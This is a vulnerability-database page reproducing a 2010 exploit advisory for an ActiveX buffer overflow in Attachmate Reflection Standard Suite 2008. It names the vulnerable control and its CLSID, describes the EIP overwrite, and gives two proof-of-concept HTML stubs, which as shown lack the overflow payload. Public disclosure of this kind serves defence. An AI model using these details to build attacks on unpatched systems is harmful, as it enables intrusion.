Vulners
Lucene search
Attachmate 13.0 / 14.0 Buffer Overflow
`
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
# Exploit Title: Reflection Attachmate Reflection Standard Suite 2008
activex buffer overflow
# Date: Mar 11, 2010 found
# Author: Rad L. Sneak (JB)
# Software Link: http://www.attachmate.com/Evals/ruo2/eval-form.htm
# Version: 13.0 & 14.0
# Tested on: WinXP SP3 & Win7 64bit
# CVE : None yet
Attachmate Reflection Standard Suite 2008 & Reflection X Both contain a
buffer overflow that could be triggered via activex. when r2axctrl.ocx
is sent large string to the Reflection for UNIX & OpenVMS control class
a crash happens that overwrites EIP with 41414141.
Please let me know if there is problems with the attachment. It contains
PoC code.
Thank you
Rad L. Sneak (JB)
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.10 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/
iQEcBAEBAgAGBQJL8rGfAAoJEMUkYWFtbqnq1uoH/0y2ZsaQh5Rxs/bCuyDDTeML
qq+loYBEOZqpWgY0ZPSmYeVKWZubgBjbpR1ki2WIfOcPvlcM3G1monWwwd0TwWhn
opwsaTlyP8Kd7QfL/ndgfYaAhKG9oHcf+TGDEuLz4QyUZ9xzZvLoBP7I8lhpkI+g
5I85/YmZFbHmejt3v65qWy9V83Fztxuq0XD7Z3JL/dDMDJak8gxZzy4JuZacewMT
iSsMF2ddQ5kjsb+Eeh8JZrAozJChbg2nZ0X7hXnfUmxA+iJ2sWj+HCw6gzKRKQ2p
MCeo5DKNVwttMxE2LHdHz808ZGBJTf4hdqLbmWUw9apWngtbQPg9zLXqvRnmc40=
=GKxw
-----END PGP SIGNATURE-----
# Exploit Title: Reflection Attachmate Reflection Standard Suite 2008 activex buffer overflow
# Date: Mar 11, 2010 found
# Author: Rad L. Sneak (JB)
# Software Link: http://www.attachmate.com/Evals/ruo2/eval-form.htm
# Version: 13.0 & 14.0
# Tested on: WinXP SP3 & Win7 64bit
# CVE : None yet
Attachmate Reflection Standard Suite 2008 & Reflection X Both contain a buffer overflow that could be triggered via activex. when r2axctrl.ocx is sent large string to the Reflection for UNIX & OpenVMS control class a crash happens that overwrites EIP with 41414141.
# Code : [PoC exploit below]
______________________________________________________________________________
<html>
PoC1
<?XML version='1.0' standalone='yes' ?>
<package><job id='DoneInVBS' debug='false' error='true'>
<object classid='clsid:15B168B2-AD3C-11D1-A8D8-00A0C9200E61' id='target' />
</job></package></html>
___________________________________________________________________________________
May need to throw a refresh to trigger PoC2 completely
__________________________________________________________________________________
<html>
PoC2
<?XML version='1.0' standalone='yes' ?>
<package><job id='DoneInVBS' debug='false' error='true'>
<object classid='clsid:15B168B2-AD3C-11D1-A8D8-00A0C9200E61' id='target' />
</job></package></html>
___________________________________________________________________________________________
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
19 May 2010 00:00Current
1Low risk
Vulners AI Score1